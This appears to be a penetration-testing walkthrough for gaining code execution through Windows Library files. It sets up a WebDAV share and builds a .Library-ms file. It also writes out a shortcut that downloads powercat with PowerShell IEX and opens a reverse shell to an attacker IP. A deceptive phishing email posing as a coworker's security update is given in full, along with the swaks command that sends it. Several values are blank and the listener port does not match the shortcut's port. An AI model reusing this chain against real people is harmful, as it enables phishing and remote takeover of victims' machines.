Code execution via Windows Library Files
Last updated
Last updated
Enable webdav share
mkdir /home/kali/webdav
cd ~/webdav
python -m venv .venv
source .venv/bin/activate
python -m pip install -U pip
python -m pip install wsgidav cheroot lxml
wsgidav --host=0.0.0.0 --port=80 --auth=anonymous -r /home/kali/webdav/
Create 2 file on Windows
open window machine
Open vscode
create new file name config.Library-ms
<?xml version="1.0" encoding="UTF-8"?> <libraryDescription xmlns=""> <name>@windows.storage.dll,-34582</name> <version>6</version> <isLibraryPinned>true</isLibraryPinned> <iconReference>imageres.dll,-1003</iconReference> <templateInfo> <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType> </templateInfo> <searchConnectorDescriptionList> <searchConnectorDescription> <isDefaultSaveLocation>true</isDefaultSaveLocation> <isSupported>false</isSupported> <simpleLocation> <url></url> </simpleLocation> </searchConnectorDescription> </searchConnectorDescriptionList> </libraryDescription>
save on desktop
create a shortcut file name install
Right click on desktop New>shortcut
enter command in item’s location
powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('');powercat -c 192.168.119.3 -p 4444 -e powershell"
Transfer both file on webdav dir
On Webdav dir
nano body.txt
Hey! I checked mail and discovered that the previously used staging script still exists in the Git logs. I'll remove it for security reasons. On an unrelated note, please install the new security features on your workstation. For this, download the attached file, double-click on it, and execute the configuration shortcut within. Thanks! John
cp /usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1 .
and 2 file from windows
python3 -m http.server 8000
nc -nvlp 444
Now send email
sudo swaks -t -t --from --attach @config.Library-ms --server 192.168.50.242 --body @body.txt --header "Subject: Staging Script" --suppress-data -ap
